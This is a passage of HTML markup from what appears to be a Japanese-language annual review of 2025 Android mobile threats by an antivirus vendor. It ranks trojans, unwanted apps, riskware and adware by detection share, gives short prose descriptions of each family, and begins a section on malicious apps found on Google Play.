    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Android.HiddenAds&amp;lng=ja"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.657.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Android.HiddenAds&amp;lng=ja"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4214&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Android.HiddenAds&amp;lng=ja"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.655.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Android.HiddenAds&amp;lng=ja"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4213&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Android.HiddenAds&amp;lng=ja"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.666.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;迷惑な広告を表示するよう設計されたトロイの木馬です。無害でポピュラーなアプリを装って拡散されることが多く、別のマルウェアによってシステムディレクトリ内にインストールされる場合もあります。通常、これらのトロイの木馬はAndroidデバイス上に侵入すると自らの存在をユーザーから隠そうとします（ホーム画面からアイコンを「隠す」など）。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Android.MobiDash&amp;lng=ja"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7859&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;迷惑な広告を表示させるトロイの木馬です。開発者によってアプリケーション内に埋め込まれる特殊なソフトウェアモジュールです。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Android.FakeApp&amp;lng=ja"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;設定にハードコードされたWebサイトを開くトロイの木馬アプリです。既知の亜種ではオンラインカジノのサイトが開かれます。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Click&amp;lng=ja"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;さまざまなWebサイトをバックグラウンドで密かに読み込むことができる、悪意のあるWhatsApp Messenger Mod（改造版）の検出名です。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Packed&amp;lng=ja"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57146&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;一般的な商用のコード難読化ツールを使用してパックされた悪意のあるアプリの検出名です。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Triada&amp;lng=ja"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5847&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Triada&amp;lng=ja"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; トロイの木馬を検出や解析から保護するよう設計されたパッカーの検出名です。多くの場合、このパッカーは &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Triada&amp;lng=ja"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; が埋め込まれた悪意のあるTelegramメッセンジャーMod（改造版）と一緒に用いられます。&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;&lt;b&gt;望ましくないアプリケーション&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;2025年に最も多く検出された望ましくないアプリケーションは51.96%を占めて再び &lt;a href="https://vms.drweb.co.jp/search/?q=Program.FakeMoney&amp;lng=ja"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt; となりました。これらはさまざまなタスクを完了することで仮想報酬を得ることができるとうたうアプリです。この報酬は現金化できるとされていますが、実際にはユーザーがお金を受け取ることはありません。同様のアプリである &lt;a href="https://vms.drweb.co.jp/search/?q=Program.FakeMoney&amp;lng=ja"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14&lt;/b&gt; や &lt;a href="https://vms.drweb.co.jp/search/?q=Program.FakeMoney&amp;lng=ja"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.16&lt;/b&gt; も広く拡散されましたが、その検出数ははるかに少ないものとなっています。 &lt;/p&gt;

&lt;p&gt;アンチウイルスの動作を模倣して存在しない脅威の検出を通知し、検出された問題を「修復」するために製品の完全版を購入するよう促すアプリ &lt;a href="https://vms.drweb.co.jp/search/?q=Program.FakeAntiVirus&amp;lng=ja"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; が10.37%を占めて2位につけました。&lt;/p&gt;

&lt;p&gt;3位となったのはクラウドサービスCloudInjectを使用して改造されたアプリケーション &lt;a href="https://vms.drweb.co.jp/search/?q=Program.CloudInject&amp;lng=ja"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; で、6.41%を占めています。その亜種である &lt;a href="https://vms.drweb.co.jp/search/?q=Program.CloudInject&amp;lng=ja"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt; が5.08%を占めて &lt;a href="https://vms.drweb.co.jp/search/?q=Program.CloudInject&amp;lng=ja"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; に迫り、4位となりました。これらのアプリケーションの改造はリモートサーバー上で直接行われます。CloudInjectサービスへのアクセスはユーティリティ&lt;a href="https://vms.drweb.co.jp/search/?q=Tool.CloudInject&amp;lng=ja"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt; によって提供されますが、これはCloudInjectサービスを使用するためのシェルにすぎません。アプリケーションには改造過程で危険な権限や難読化されたコードが追加され、そのうえ、改造後のアプリは改造者がCloudInjectサービスを介してリモートで管理できるようになります（アプリをロックし、使用を継続するためにコード入力を要求するなど）。&lt;/p&gt;

&lt;p&gt;ユーザーを監視し、そのアクティビティをコントロールするために使用できるアプリの検出数はわずかに増加しています。こうしたアプリは悪意のあるアクターが手にした途端にスパイウェアと化します。&lt;a href="https://vms.drweb.co.jp/search/?q=Program.TrackView&amp;lng=ja"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; とその亜種である &lt;a href="https://vms.drweb.co.jp/search/?q=Program.TrackView&amp;lng=ja"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt; はそれぞれ2.40%から2.91%、0.21%から0.97%へと増加しました。&lt;a href="https://vms.drweb.co.jp/search/?q=Program.SecretVideoRecorder&amp;lng=ja"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; は2.03%から2.56%、その亜種である &lt;a href="https://vms.drweb.co.jp/search/?q=Program.SecretVideoRecorder&amp;lng=ja"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt; —は0.90%から1.02%に増加し、そして &lt;b&gt;Program.SnoopPhone.1.origin&lt;/b&gt; は0.31%から1.01%に増加しています。&lt;/p&gt;

&lt;p&gt;以下のグラフは2025年に最も多く検出された上位10の望ましくないアプリケーションです。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/09_2025_unwanted_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/09_2025_unwanted_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Program.FakeMoney&amp;lng=ja"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Program.FakeMoney&amp;lng=ja"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;さまざまなタスクを完了することでお金を稼ぐことができるとうたうAndroidアプリケーションの検出名です。このアプリはタスクが完了するたびに報酬が貯まっていくかのように見せかけます。「稼いだ」お金を引き出すために（多くの場合、一般的に広く使用されている支払いシステムや銀行を指定されます）、ユーザーは一定の金額を貯める必要があるとされていますが、たとえその金額が貯まったとしても実際にお金を手にすることはできません。このウイルスレコードは、そのようなアプリのソースコードを基に作成された他の望ましくないソフトウェアの検出にも使用されます。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Program.FakeAntiVirus&amp;lng=ja"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;アンチウイルスソフトウェアを模倣するアドウェアアプリケーションの検出名です。これらのアプリは存在しない脅威について偽の通知をすることでユーザーを騙し、ソフトウェアの完全版を購入するよう要求します。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Program.CloudInject&amp;lng=ja"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Program.CloudInject&amp;lng=ja"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;クラウドサービスCloudInjectと、同名のAndroidユーティリティ（&lt;a href="https://vms.drweb.co.jp/search/?q=Tool.CloudInject&amp;lng=ja"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt; としてDr.Webウイルスデータベースに追加されています）を使用して改造されたAndroidアプリケーションの検出名です。アプリケーションはリモートサーバー上で改造されますが、その際、改造者はアプリに何が追加されるのか具体的な改造内容をコントロールすることができません。また、これらのアプリケーションは危険なシステム権限を複数要求します。改造後のアプリは改造者がリモートで管理できるようになります（アプリをブロックする、カスタムダイアログを表示する、他のソフトウェアのインストールや削除を追跡するなど）。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Program.TrackView&amp;lng=ja"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Program.TrackView&amp;lng=ja"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Androidデバイスを通じてユーザーを監視できるようにするアプリケーションの検出名です。このアプリを使用することで、悪意のあるアクターがデバイスの位置を追跡したり、カメラで動画や写真を撮ったり、マイクで周囲の音を聞いたり、音声を録音したりすることが可能になります。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Program.SecretVideoRecorder&amp;lng=ja"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Program.SecretVideoRecorder&amp;lng=ja"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Androidデバイスの内蔵カメラを使用して周囲の動画や写真を撮影するよう設計されたアプリケーションの、さまざまな亜種の検出名です。撮影中であることを知らせる通知を無効にしたり、アプリのアイコンと表示名を偽のものに置き換えたりすることができ、密かに動作することが可能です。これらの機能により、潜在的に危険なソフトウェアとみなされます。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Program.SnoopPhone.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Androidユーザーのアクティビティを監視するよう設計されたアプリケーションです。このアプリを使用することで、第三者がSMSを読む、通話に関する情報を収集する、デバイスの位置を追跡する、周囲の音声を録音することが可能になります。&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;&lt;b&gt;リスクウェア&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;2025年に最も多く検出されたリスクウェアは、NP Managerユーティリティを使用して改造されたアプリとなりました。NP Managerはアプリを改造するために設計されたツールで、アプリのコードを難読化して保護するためのモジュールや、改造後にデジタル署名検証をすり抜けるためのモジュールが実装されています。多くの場合、脅威アクターは悪意のあるアプリケーションを保護しアンチウイルスによる検出をより困難なものにするためにこのツールを使用します。これらアプリの検出数は2024年の24.52%から53.59%へと増加し、2025年にはリスクウェア検出数全体の半数以上を占めています。最も多く検出された亜種は &lt;b&gt;Tool.NPMod.3&lt;/b&gt;（32.85%）、&lt;b&gt;Tool.NPMod.1&lt;/b&gt;（12.61%）、&lt;b&gt;Tool.NPMod.1.origin&lt;/b&gt;（3.02%）、&lt;b&gt;Tool.NPMod.4&lt;/b&gt;（2.31%）でした。&lt;/p&gt;

&lt;p&gt;プログラミング言語Luaを使用してAndroidアプリを開発するためのフレームワークである &lt;a href="https://vms.drweb.co.jp/search/?q=Tool.Androlua&amp;lng=ja"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt; の検出数は3.93%から8.11%に増加しました。このようなフレームワークはアクセシビリティサービス（ユーザー補助機能）の使用を含む多くのシステム権限を要求します。&lt;a href="https://vms.drweb.co.jp/search/?q=Tool.Androlua&amp;lng=ja"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt; フレームワークを使用して作成されたアプリは、実行直前に復号化される暗号化されたLuaスクリプトをベースにしており、こうしたスクリプトは悪意のあるものとなりえます。ツール &lt;a href="https://vms.drweb.co.jp/search/?q=Tool.LuckyPatcher&amp;lng=ja"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt; を使用して改造されたアプリの検出数も8.16%から10.06%に増加しています。このツールは特別なスクリプトをインターネットからダウンロードすることにより、Androidデバイスにインストールされているアプリを改変します。&lt;/p&gt;

&lt;p&gt;一方、Androidアプリをインストールせずに実行できるようにするユーティリティ &lt;a href="https://vms.drweb.co.jp/search/?q=Tool.SilentInstaller&amp;lng=ja"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt; は33.10%から10.55%に減少しました。最も多く検出された亜種は &lt;a href="https://vms.drweb.co.jp/search/?q=Tool.SilentInstaller&amp;lng=ja"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14.origin&lt;/b&gt;（4.66%）、&lt;a href="https://vms.drweb.co.jp/search/?q=Tool.SilentInstaller&amp;lng=ja"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.6.origin&lt;/b&gt;（2.07%）、&lt;a href="https://vms.drweb.co.jp/search/?q=Tool.SilentInstaller&amp;lng=ja"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt;（1.88%）となっています。また、パッカー&lt;a href="https://vms.drweb.co.jp/search/?q=Tool.Packer&amp;lng=ja"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; によって保護されたアプリの検出数も13.17%から2.58%へと減少しています。&lt;/p&gt;

&lt;p&gt;以下のグラフは2025年に最も多く検出された上位10のリスクウェアです。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/10_2025_riskware_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/10_2025_riskware_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;NP Managerユーティリティを使用して改造されたAndroidアプリの検出名です。NP Managerにはアプリのコードを難読化して保護するためのモジュールや、改造後にデジタル署名の検証をバイパスするためのモジュールが実装されています。多くの場合、難読化はマルウェアの検出や解析をより困難にする目的で行われます。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Tool.Androlua&amp;lng=ja"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;スクリプト言語Luaを使用してAndroidアプリを開発するための特別なフレームワークの、潜在的に危険なバージョンの検出名です。Luaベースアプリの主なロジックは、実行時に対応するスクリプトがインタプリタによって暗号化・復号化されるというものです。多くの場合、このフレームワークは動作するためにデフォルトで多数のシステム権限へのアクセスを要求します。その結果、フレームワークが実行するLuaスクリプトによって、取得した権限に応じたさまざまな悪意のある動作が実行される可能性があります。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Tool.LuckyPatcher&amp;lng=ja"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Tool.LuckyPatcher&amp;lng=ja"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Androidデバイスにインストールされたアプリを改変できるようにする（パッチを作成する）ツールです。アプリの動作ロジックを変更したり特定の制限を回避したりする目的で使用されます。たとえば、ユーザーはこのツールを使用することで、バンキングアプリのルートアクセス検証を無効にしたり、ゲーム内で無限のリソースを取得したりできます。パッチを追加するために、このユーティリティは特別に作成されたスクリプトをインターネットからダウンロードしますが、このスクリプトは誰でも作成して共通のデータベースに追加することができます。そのようなスクリプトの機能が悪意のあるものである場合もあることから、このツールを使用して作成されたパッチは潜在的な脅威となる可能性があります。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Tool.SilentInstaller&amp;lng=ja"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;アプリケーションがAPKファイルをインストールせずに実行できるようにする、リスクウェアプラットフォームです。埋め込まれているアプリのコンテキスト内で仮想ランタイム環境を作成します。これらのプラットフォームを使用して起動されたAPKファイルは、アプリの一部であるかのように動作し、アプリと同じ権限を取得します。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Tool.Packer&amp;lng=ja"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Androidアプリケーションを不正な改変やリバースエンジニアリングから保護するよう設計されたパッカーツールです。このツール自体は悪意のあるものではありませんが、無害なアプリケーションだけでなく悪意のあるアプリケーションを保護するために使用される可能性があります。&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;&lt;b&gt;アドウェア&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;2025年に最も多く検出されたアドウェアは、&lt;a href="https://vms.drweb.co.jp/search/?q=Adware.ModAd&amp;lng=ja"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; として検出されるWhatsApp MessengerのMod（改造版）でした。この改造版には使用中にリンクを開く機能が追加されており、ユーザーはそれらのリンクから広告サイトへとリダイレクトされます。アドウェア検出数全体に占める &lt;a href="https://vms.drweb.co.jp/search/?q=Adware.ModAd&amp;lng=ja"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; の割合は2024年の47.45%から26.90%に減少しています。&lt;/p&gt;

&lt;p&gt;Androidアプリに組み込まれて広告を含んだ通知を表示させるモジュール &lt;a href="https://vms.drweb.co.jp/search/?q=Adware.Adpush&amp;lng=ja"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt; が、14.76%から26.19%へとシェアを伸ばして2位にランクインしました。3位となったのは2024年とほぼ変わらず8.88%を占めた &lt;b&gt;Adware.Basement&lt;/b&gt; ファミリーです。&lt;b&gt;Adware.Basement&lt;/b&gt; は悪意のあるサイトにつながる広告を表示させます。&lt;/p&gt;

&lt;p&gt;そのほか、&lt;a href="https://vms.drweb.co.jp/search/?q=Adware.Airpush&amp;lng=ja"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt;（4.35%から5.14%に増加）、&lt;a href="https://vms.drweb.co.jp/search/?q=Adware.Fictus&amp;lng=ja"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;（3.29%から6.21%に増加）、&lt;b&gt;Adware.Youmi&lt;/b&gt;（1.62%から2.91%に増加）、&lt;a href="https://vms.drweb.co.jp/search/?q=Adware.Leadbolt&amp;lng=ja"&gt;&lt;b&gt;Adware.Leadbolt&lt;/b&gt;&lt;/a&gt;（2.26%から2.41%に増加）、&lt;b&gt;Adware.Jiubang&lt;/b&gt;（1.70%から2.38%に増加）ファミリーに属するアドウェアも多く検出されています。&lt;/p&gt;

&lt;p&gt;以下のグラフは2025年に最も多く検出された上位10のアドウェアです。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/11_2025_adware_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/11_2025_adware_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Adware.ModAd&amp;lng=ja"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;その機能に特定のコードが挿入されている、WhatsApp MessengerのMod（改造版）です。このコードはメッセンジャーの動作中にWebコンテンツを表示（Android WebViewコンポーネントを使用して）させることで目的のURLをロードします。これらのURLから、オンラインカジノやブックメーカー、アダルトサイトなどの広告サイトへのリダイレクトが実行されます。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Adware.AdPush&amp;lng=ja"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Adware.Adpush&amp;lng=ja"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Adware.AdPush&amp;lng=ja"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.39.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Androidアプリに組み込まれ、さまざまな広告を表示するアドウェアモジュールのファミリーです。表示されるものはモジュールのバージョンや亜種によって異なり、広告を含む通知やポップアップウィンドウ、バナーなどがあります。多くの場合、攻撃者はユーザーにさまざまなソフトウェアをインストールするよう促してマルウェアを拡散させる目的で、これらのモジュールを使用しています。さらに、これらモジュールは個人情報を収集してリモートサーバーに送信します。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Basement.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;迷惑な広告を表示するアプリです。多くの場合、それらの広告は悪意のあるサイトや詐欺サイトにつながっています。このアプリには望ましくないアプリ &lt;a href="https://vms.drweb.co.jp/search/?q=Program.FakeMoney&amp;lng=ja"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt; と同じコードベースが使用されています。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Adware.Fictus&amp;lng=ja"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;人気のAndroid アプリやゲームのクローンバージョンに組み込まれるアドウェアモジュールで、その際にnet2shareパッカーが使用されます。この方法で作成されたアプリのコピーはさまざまな配信ストアから拡散され、Androidデバイス上にインストールされると迷惑な広告を表示します。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Adware.Airpush&amp;lng=ja"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Androidアプリに組み込まれ、さまざまな広告を表示するアドウェアモジュールのファミリーです。表示されるものはモジュールのバージョンや亜種によって異なり、広告を含む通知やポップアップウィンドウ、バナーなどがあります。多くの場合、攻撃者はユーザーにさまざまなソフトウェアをインストールするよう促してマルウェアを拡散させる目的で、これらのモジュールを使用しています。さらに、これらモジュールは個人情報を収集してリモートサーバーに送信します。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Adware.Youmi&amp;lng=ja"&gt;&lt;b&gt;Adware.Youmi&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Androidデバイスのホーム画面に広告ショートカットを追加する、望ましくないアドウェアモジュールの検出名です。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Jiubang.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Androidデバイス向けの望ましくないアドウェアで、アプリケーションのインストール時に特定のプログラムを宣伝するバナーを表示させます。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Adware.Inmobi&amp;lng=ja"&gt;&lt;b&gt;Adware.Inmobi&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;InmobiのアドウェアSDKの一部バージョンの検出名です。電話をかけたり、Android デバイスのカレンダーにイベントを追加したりできます。&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Google Play上の脅威&lt;/h3&gt;

&lt;p&gt;2025年、Doctor WebのアンチウイルスラボはGoogle Playで180を超える悪意のあるアプリ、望ましくないアプリ、アドウェアアプリを発見しました。これらのアプリは合計で216万5040回以上ダウンロードされています。その中には、感染させたデバイス上で自身の存在を隠し、システムインターフェースや他のプログラムの上に重ねて広告を表示させるトロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.HiddenAds&amp;lng=ja"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4213&lt;/b&gt; と &lt;a href="https://vms.drweb.co.jp/search/?q=Android.HiddenAds&amp;lng=ja"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4215&lt;/b&gt; のさまざまな亜種が含まれており、画像編集ツールや写真・動画を撮影するためのカメラアプリなどを装って拡散されていました。&lt;/p&gt;

&lt;div class="img img-two mb-3"&gt;
    &lt;a href="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/12_Android.HiddenAds.4215_2025.png" class="preview"&gt;
    &lt;img src="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/12_Android.HiddenAds.4215_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
